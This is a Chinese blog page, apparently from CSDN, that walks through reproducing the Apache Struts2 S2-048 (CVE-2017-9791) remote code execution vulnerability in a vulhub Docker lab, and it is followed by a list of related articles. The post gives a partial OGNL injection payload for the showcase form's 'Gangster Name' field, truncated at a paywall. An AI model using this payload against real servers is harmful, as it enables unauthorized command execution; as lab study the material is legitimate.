struts2 s2-048漏洞复现

最新推荐文章于 2024-09-11 17:16:14 发布
最新推荐文章于 2024-09-11 17:16:14 发布
阅读量452 收藏 1
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wodepzw/article/details/103141431
版权
在Docker环境下,通过vulhub靶场进行Struts2 S2-048漏洞的复现。首先启动docker服务和靶场环境,然后访问特定URL。漏洞存在于Integration/Struts 1 Integration部分,通过输入特定POC(Payload of Concept)在Gangster Name表单触发OGNL表达式,实现执行系统命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

我在docker中搭得的vulhub靶场
1.开启环境
命令
开启docker :service docker start
启动环境 :docker-compose up -d
2.环境启动好后访问http://your-ip:8080/showcase/
在这里插入图片描述
3.这个漏洞在integraton下的struts1处
在这里插入图片描述
4.访问Integration/Struts 1 Integration:

在这里插入图片描述
5.触发OGNL表达式的位置是Gangster Name这个表单,在此处填写poc即可
poc:%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)😦(#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUti

最低0.47元/天 解锁文章
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-048(CVE-2017-9791)
qq_51577576的博客
12-16 1443
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-048(CVE-2017-9791) Apache Struts2 2.3.x 系列启用了struts2-struts1-plugin 插件并且存在 struts2-showcase 目录,其漏洞成因是当ActionMessage接收客户可控的参数数据时,用户可控的值添加到 ActionMessage 并在客户前端展示,导致其进入 getText 函数,最后 message 被当作 ognl 表达式执行,导致任意代码执行。
漏洞复现Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-11 579
描述:Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。攻击者构造恶意字段值(value)通过Struts2struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。......
Struts2 S2-009复现
ZJT6666666的博客
12-21 250
Struts2 S2-009复现
Struts2漏洞复现
weixin_51151498的博客
12-14 1472
Struts2漏洞复现
java struts2 漏洞复现合集
whatday的专栏
08-31 7491
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
Struts2框架漏洞总结与复现(上) 含Struts2检测工具
剁椒鱼头没剁椒的博客
02-06 1万+
如果在配置 Action 中 Result 时使用了重定向类型,并且还使用paramname作为重定向变量,UserAction中定义有一个name变量,当触发redirect类型返回时,Struts2获取使用{name}获取其值,在这个过程中会对name参数的值执行OGNL表达式解析,从而可以插入任何OGNL表达式导致命令执行。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。
Struts2-048漏洞复现
最新发布
hongji728696的博客
09-11 1024
struts2是一个apache的框架,存在反序列化漏洞,在struts2中存在OGNL表达式,OGNL表达式的二次解析导致这一漏洞
Struts2 S2-046漏洞复现 (CVE-2017-5638)
1
05-27 4260
一:漏洞介绍 名称: struts2-046 远程代码执行 (CVE-2017-5638) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导
Struts2 S2-046漏洞复现
2301_76467680的博客
07-09 840
在xb中间加个空格选中后改为00,再发包。修改filename参数。成功实现远程命令执行。
Struts2-062复现
kriesa的博客
07-13 294
Struts2-062复现
Struts2反序列化漏洞复现
热门推荐
wangyuxiang946的博客
07-20 1万+
作者简介」:冬奥会网络安全中国代表队,优快云 Top100,就职奇安信多年,以实战工作为基础著作,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。环境: vulhub
vulhub漏洞复现系列之struts2(s2-048、s2-052、S2-053、s2-057、s2-059)
weixin_43071873的博客
12-11 1423
本来想把struts2剩下的靶场全部打完然后写博客分享给大家,但是vulhub搭建实在是太慢了!!!无奈只能先把复现好的这几个分享出来了。 ** (CVE-2017-9791)s2-048 ** 一、漏洞简介 当实用了Struts2 Struts1 插件时,可能导致不受信任的输入传入到ActionMessage类种导致命令执行 二、影响范围 2.3.x 三、漏洞复现: 进入靶场 第一个框填入${4*4},其余两个框随意填 可以看到计算结果回显出来了 Poc: %{(#dm=@ognl.OgnlCon
Struts2 S2-048漏洞复现
xy_sugar的博客
02-22 1675
漏洞原理: 这个漏洞主要问题出在struts2-struts1-plugin这个插件包上。这个库的主要作用就是将struts1的action封装成struts2的action以便它能在strut2上运行使用。 而由于struts2-struts1-plugin 包中的 “Struts1Action.java” 中的 execute 函数可以调用 getText() 函数,这个函数刚好又能执行O...
技术分析 | Struts2 S2-048漏洞:跟踪攻击趋势,成功检测防御
weixin_33888907的博客
07-10 472
7月7日,Apache Struts官方发布了漏洞编号为:S2-048的高危漏洞公告。 阿里云安全团队2小时内发布官方安全建议,跟踪S2-048的全球攻击趋势,并对不同漏洞版本进行了对比分析。 目前,阿里云云盾态势感知已支持检测,WAF默认支持防御。 一、影响范围 如果在ApacheStruts 2.3.x系列中启用了struts2-struts1-...
structs2048漏洞复现 2.3.32版本
weixin_30390075的博客
04-12 153
S2-048 远程代码执行漏洞 影响版本: 2.0.0 - 2.3.32 之前在网上说只要时2.3.*的版本都有这个漏洞,自己装了个2.3.34的试了几次都没有执行 然后下载了找到了这篇文章才知道影响版本时2.0.0到2.3.32 https://vulhub.org/#/environments/struts2/s2-048/ 于是在网上找到了这个2.3.32版...
Struts-S2-048漏洞测试
黑面狐
09-08 3807
这个是7月份爆出的漏洞了。 可以远程执行代码,想想就很厉害的样子。 一、环境搭建。 tomcat  /  jdk   /Struts-2.3.24-apps.zip tomcat和jdk直接跳过了   包含漏洞环境的安装包下载地址:http://download.youkuaiyun.com/download/qq1124794084/9969407 下载解压完成后,把struts2-showc
Apache Struts2--048远程代码执行漏洞复现
m0_48520508的博客
12-28 658
0x00简介 Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 0x01漏洞概述 Apache Struts2 2.3.x 系列启用了struts2-struts1-plugin 插件并且存在 struts2-showcase 目录,其漏洞成因是当A.
struts2-048漏洞复现
qq_46804551的博客
04-08 190
搭建 访问成功 复现 . 在浏览器输入以下链接访问漏洞页面 http://your-ip:8080/integration/saveGangster.action 在表单中填入如上,主要第一个表单其他可以随便乱写,点解submit 在Gangster Name”处把${1+1}修改为以下命令执行的payload语句 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#con
S2-048 远程代码执行漏洞检测利用
a1b2c3是弱口令
12-11 1777
2017年7月7日,ApacheStruts 发布最新的安全公告,Apache Struts2的strus1插件存在远程代码执行的高危漏洞漏洞编号为 CVE-2017-9791(S2-048)。攻击者可以构造恶意的字段值通过Struts2struts2-struts1-plugin插件,远程执行代码。 漏洞记录 S2-048 CVE-2017-9791 Struts 2.3.X http:...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值